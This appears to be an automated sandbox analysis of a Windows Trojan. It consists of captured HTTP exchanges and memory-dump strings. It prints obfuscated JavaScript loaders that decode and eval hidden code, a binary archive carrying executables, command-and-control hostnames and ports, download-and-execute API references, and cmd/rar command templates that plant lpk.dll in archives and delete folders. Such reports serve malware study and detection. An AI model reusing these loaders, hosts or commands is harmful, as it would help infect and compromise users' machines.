User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.30wz.com

Connection: Keep-Alive

HTTP/1.0 200 OK

Content-Type: text/html

Content-Length: 82

Pragma: no-cache

Cache-control: no-store

<html><body><script>var bo="/........",co="djfz2",fo,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo )do_[fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 1])&0xff;}while( fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo ;}";eval(fo);eo="";for(fo=1;fo<do_.length-1;fo )if(fo%6)eo =String.fromCharCode(do_[fo]^ao);fo=eval;fo(eo);}eo="_\x95\xb7\xbd\xdf\xb4\xdb].\x1az\x16j\xbf\x1c\xe2\x16\xde\x13\xc3\xc1\xd4\xbd\x8c\x8a\xedC\xee5\xeb\xa1\xa7\xa2\x9e\xd9\x96\xd7\x9e\x88W{L\x9f[\x97QA\xffx\xcfE\x9a\x8d4";zo(226);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 826.Pragma: no-cache..Cache-control: no-store..<html><body><script>var bo="/........",co="djfz2",fo,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo )do_[fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 1])&0xff;}while( fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo ;}";eval(fo);eo="";for(fo=1;fo<do_.length-1;fo )if(fo%6)eo =Strin

<<< skipped >>>

GET /.........rar?rqrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.30wz.com

Connection: Keep-Alive

HTTP/1.0 200 OK

Content-Type: text/html

Content-Length: 85

Pragma: no-cache

Cache-control: no-store

<html><body><script>var it="/........",jt="djfz2",mt,kt=new Array(),lt;function gt(ht){for(mt=0;mt<lt.length;mt )kt[mt]=lt.charCodeAt(mt);mt=49;do{if(mt<3)break;kt[mt]=((kt[mt] kt[mt-1])&0xff)^131;mt--;}while(true);for(mt=51;;){if(mt<1)break;kt[mt]=(kt[mt] kt[mt-1])&0xff;mt--;}mt="mt=49;do{kt[mt]=((((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)<<7)&0xff)|(((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)>>1);}while(--mt>=2);";eval(mt);lt="";for(mt=1;mt<kt.length-1;mt )if(mt%6)lt =String.fromCharCode(kt[mt]^ht);eval("mt=eval;mt(lt);");}lt="\x1a\xa3\x91\x0e\x8f\x85 \xa1\xfbA\xd8\xe9\x1b/\x88;\xf1I\xf0kG\xbf\xe8\x1d\xc75V/\xfb\xa7\x85\xbc\x19\xc7\x83\xde\xf1w\xc74\x91\x0f\xc6O\x17\x97\xf0I\x9b\x9d&z\xbe\x91";gt(202);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>..

GET /.........rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.ghyyy.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: safeshield/v2

Content-Length: 768

Content-Type: text/html; charset=gb2312

Pragma: no-cache

Cache-control: no-store

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Connection: Close

Set-Cookie: ssfwkey=actzmz

<script>function rrxbwVS(){var y="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" y ")");}function fykzrDK(tIzM){var b;var G;b="";for(var a=0;a<tIzM.length;a ){G=tIzM.charCodeAt(a)^15;b =String.fromCharCode(G^14);}return b;}function fbhvhWI(){var cEmV = document.getElementById("pVoM").value;var qPhY=rrxbwVS();window.location=fykzrDK(qPhY) cEmV;}function sgwdvJF(){var y="107,53,104,52,53";return eval("String.fromCharCode(" y ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var cAtE=sgwdvJF();document.write(fykzrDK(cAtE));</script> </font><input id="pVoM"> <input type=button value="................" onmouseup="fbhvhWI()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 753..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function nwcznTK(){var x="16,0,76,76,89,72,84,90,70,2,70,6,85,6,11";return eval("String.fromCharCode(" x ")");}function vzhssNW(){var kGnY = document.getElementById("rRaS").value;var gYgG=nwcznTK();window.location=twxhsZL(gYgG) kGnY;}function twxhsZL(mOjI){var s;var X;s="";for(var a=0;a<mOjI.length;a ){X=mOjI.charCodeAt(a)^32;s =String.fromCharCode(X^31);}return s;}function cgtziVX(){va

<<< skipped >>>

GET /.........rar?rqckm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.ghyyy.com

Connection: Keep-Alive

Cookie: ssfwkey=actzmz

HTTP/1.1 200 OK

Server: safeshield/v2

Content-Length: 768

Content-Type: text/html; charset=gb2312

Pragma: no-cache

Cache-control: no-store

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Connection: Close

Set-Cookie: ssfwkey=actzmz

<script>function jvlloAB(iWlZ){var e;var X;e="";for(var m=0;m<iWlZ.length;m ){X=iWlZ.charCodeAt(m)^17;e =String.fromCharCode(X^16);}return e;}function fedavTX(){var k="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" k ")");}function mfofrCD(){var eBqV = document.getElementById("jPlK").value;var xCeM=fedavTX();window.location=jvlloAB(xCeM) eBqV;}function nzrqhXY(){var k="107,53,104,52,53";return eval("String.fromCharCode(" k ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var yGiK=nzrqhXY();document.write(jvlloAB(yGiK));</script> </font><input id="jPlK"> <input type=button value="................" onmouseup="mfofrCD()"><br><br></h3><center></html>..

GET /.........rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.86jfw.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Length: 9337155

Content-Type: application/octet-stream

Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT

Accept-Ranges: bytes

ETag: "7cee72e7991d01:29b"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 17 Nov 2014 12:11:12 GMT

Connection: keep-alive

Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ............exe..j"^yh$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&........k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c.....{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~.....s........h...f...\..A..G........?.V.....a....c.........O....A/....P...5....._......V.........#.W..&. ........n...7...........J....t.......0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F.....q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..<...........B8.)..$IH}Iw:.w...@...l.....q.GE]a...c....-fT_p"b#6...._>>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{.....o.........@...3.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.dbJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n....op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k...@.T#...Z...f../&?=...<...(...6UA8.iT..r..8....)...H6#....1..Zk~...?|....z#...zOv.....[....C...`q.y...4..c..B%]=#kR.<...._.P...7.........!........r........T(.(.$.M.{..}.|.. ..xfC4...W........*. ....L0...*F.|.......M_1..,Gy.Pf0._i._....._qD[=...CF.2#jFU..q.l.3.~..>....._.$....orY..h.")...."Z.K<..........;{K..a.l......v.i...d.|....r

<<< skipped >>>

GET /.........rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.ghyyy.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: safeshield/v2

Content-Length: 768

Content-Type: text/html; charset=gb2312

Pragma: no-cache

Cache-control: no-store

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Connection: Close

Set-Cookie: ssfwkey=actzmz

<script>function wrzdkIW(dSgS){var d;var T;d="";for(var u=0;u<dSgS.length;u ){T=dSgS.charCodeAt(u)^86;d =String.fromCharCode(T^85);}return d;}function apeuzOV(){var rEdS = document.getElementById("jNeM").value;var rExN=wlphoNK();window.location=wrzdkIW(rExN) rEdS;}function aipebBB(){var n="105,55,106,54,55";return eval("String.fromCharCode(" n ")");}function wlphoNK(){var n="44,60,112,112,101,116,104,102,122,62,122,58,105,58,55";return eval("String.fromCharCode(" n ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var cUsF=aipebBB();document.write(wrzdkIW(cUsF));</script> </font><input id="jNeM"> <input type=button value="................" onmouseup="apeuzOV()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function knhtiIU(kZaE){var y;var X;y="";for(var o=0;o<kZaE.length;o ){X=kZaE.charCodeAt(o)^38;y =String.fromCharCode(X^37);}return y;}function wocbkUA(){var jZfO = document.getElementById("gFuI").value;var cDgG=rfhtsNF();window.location=knhtiIU(cDgG) jZfO;}function xvggoOQ(){var b="105,55,106,54,55";return eval("String.fromCharCode(" b ")");}function rfhtsNF(){var b="44,60,112,112,101,1

<<< skipped >>>

GET /.........rar?rbbkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.ghyyy.com

Connection: Keep-Alive

Cookie: ssfwkey=actzmz

HTTP/1.1 200 OK

Server: safeshield/v2

Content-Length: 753

Content-Type: text/html; charset=gb2312

Pragma: no-cache

Cache-control: no-store

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Connection: Close

Set-Cookie: ssfwkey=actzmz

<script>function zrhbxSP(){var j="16,0,76,76,89,72,84,90,70,2,70,6,85,6,11";return eval("String.fromCharCode(" j ")");}function ibgnwDX(){var gWmA = document.getElementById("dLuC").value;var wBjA=zrhbxSP();window.location=cpwbpDX(wBjA) gWmA;}function cpwbpDX(dNsY){var z;var Q;z="";for(var o=0;o<dNsY.length;o ){Q=dNsY.charCodeAt(o)^32;z =String.fromCharCode(Q^31);}return z;}function adyufDW(){var j="85,11,86,10,11";return eval("String.fromCharCode(" j ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var gXoP=adyufDW();document.write(cpwbpDX(gXoP));</script> </font><input id="dLuC"> <input type=button value="................" onmouseup="ibgnwDX()"><br><br></h3><center></html>..

GET /.................rar?rbrkm HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.zz12320.com

Connection: Keep-Alive

HTTP/1.0 200 OK

Content-Type: text/html

Content-Length: 82

Pragma: no-cache

Cache-control: no-store

<html><body><br><br><br><center><h3><a href="#" onmouseup="ef(205)">..............</a></h3></center><script></script><script>var gf="/................",hf="yqjs1",kf,if_=new Array(),jf;function ef(ff){for(kf=0;kf<jf.length;kf )if_[kf]=jf.charCodeAt(kf);for(kf=49;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252)&0xff))&0xff;}kf="kf=4;while(true){if(kf>51)break;if_[kf]=(if_[kf]-if_[kf 1])&0xff;kf ;}";eval(kf);kf=51;while(kf>=2){if_[kf]=((((((if_[kf]-if_[kf-1])&0xff)-142)&0xff)<<4)&0xff)|(((((if_[kf]-if_[kf-1])&0xff)-142)&0xff)>>4);kf--;}jf="";for(kf=1;kf<if_.length-1;kf )if(kf%7)jf =String.fromCharCode(if_[kf]^ff);eval("kf=eval");kf(jf);}jf="=\xba\xbf\xf7\xb57q\xe4\x9e$R8\x96L -\x07\x99\xf3\xea\x19\x90\xdc$\xf8\x98\xc1BL\xb2\xd5\x81\xb5r\x27t<Pl\xb0<\x01\xbe\x1f\x98\xea\xd9\xe1u\x05n\xa8\x9a";</script></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 827.Pragma: no-cache..Cache-control: no-store..<html><body><br><br><br><center><h3><a href="#" onmouseup="ef(205)">..............</a></h3></center><script></script><script>var gf="/................",hf="yqjs1",kf,if_=new Array(),jf;function ef(ff){for(kf=0;kf<jf.length;kf )if_[kf]=jf.charCodeAt(kf);for(kf=49;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252)&0xff))&0xff;}kf="kf=4;while(true){if(kf>51)break;if_[kf]=(if_

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

regsvr32.exe_1680:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

ADVAPI32.dll

ADVAPI32.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

USER32.dll

USER32.dll

ole32.dll

ole32.dll

regsvr32.pdb

regsvr32.pdb

_wcmdln

_wcmdln

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

Excessive # of DLL's on cmdline

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

REGSVR32.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

OleUninitialize failed.["%1" is not an executable file and no registration

OleUninitialize failed.["%1" is not an executable file and no registration

svchost.exe_592:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

ADVAPI32.dll

ADVAPI32.dll

USER32.dll

USER32.dll

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegOpenKeyA

RegOpenKeyA

SHLWAPI.dll

SHLWAPI.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

0.0.0.0

0.0.0.0

hXXp://VVV.mojimojimojimoji.com/fuy733.html

hXXp://VVV.mojimojimojimoji.com/fuy733.html

192.168.200.113:8080

192.168.200.113:8080

%u.%u.%u.%u

%u.%u.%u.%u

hra%u.dll

hra%u.dll

VVV.mojimojimojimoji.com:38774

VVV.mojimojimojimoji.com:38774

192.168.200.113:1050

192.168.200.113:1050

iexplore.exe

iexplore.exe

stf%c%c%c%c%c.exe

stf%c%c%c%c%c.exe

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

%c%c%c%c%c.exe

%c%c%c%c%c.exe

PlusCtrl.dll

PlusCtrl.dll

%c%c%c%c%c%c.exe

%c%c%c%c%c%c.exe

%u MB

%u MB

%u MHz

%u MHz

Windows NT

Windows NT

Windows 7

Windows 7

Windows 2008

Windows 2008

Windows Vista

Windows Vista

Windows 2003

Windows 2003

Windows XP

Windows XP

Windows 2000

Windows 2000

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

\Program Files\Internet Explorer\iexplore.exe

\Program Files\Internet Explorer\iexplore.exe

#0%s!

#0%s!

%s/%s

%s/%s

GET %s HTTP/1.1

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s:%d

Host: %s

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

%d.%d.%d.%d

%d.%d.%d.%d

192.168.1.244

192.168.1.244

svchost.exe

svchost.exe

ntdll.dll

ntdll.dll

@.reloc

@.reloc

lpk.dll

lpk.dll

cmd /c RD /s /q "%s"

cmd /c RD /s /q "%s"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" x "%s" *.exe "%s\"

"%s" x "%s" *.exe "%s\"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

rar.exe

rar.exe

svchost.exe_592_rwx_00400000_0000C000:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

ADVAPI32.dll

ADVAPI32.dll

USER32.dll

USER32.dll

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

RegCloseKey

RegCloseKey

RegOpenKeyExA

RegOpenKeyExA

RegOpenKeyA

RegOpenKeyA

SHLWAPI.dll

SHLWAPI.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

0.0.0.0

0.0.0.0

hXXp://VVV.mojimojimojimoji.com/fuy733.html

hXXp://VVV.mojimojimojimoji.com/fuy733.html

192.168.200.113:8080

192.168.200.113:8080

%u.%u.%u.%u

%u.%u.%u.%u

hra%u.dll

hra%u.dll

VVV.mojimojimojimoji.com:38774

VVV.mojimojimojimoji.com:38774

192.168.200.113:1050

192.168.200.113:1050

iexplore.exe

iexplore.exe

stf%c%c%c%c%c.exe

stf%c%c%c%c%c.exe

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

%c%c%c%c%c.exe

%c%c%c%c%c.exe

PlusCtrl.dll

PlusCtrl.dll

%c%c%c%c%c%c.exe

%c%c%c%c%c%c.exe

%u MB

%u MB

%u MHz

%u MHz

Windows NT

Windows NT

Windows 7

Windows 7

Windows 2008

Windows 2008

Windows Vista

Windows Vista

Windows 2003

Windows 2003

Windows XP

Windows XP

Windows 2000

Windows 2000

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

\Program Files\Internet Explorer\iexplore.exe

\Program Files\Internet Explorer\iexplore.exe

#0%s!

#0%s!

%s/%s

%s/%s

GET %s HTTP/1.1

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s:%d

Host: %s

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

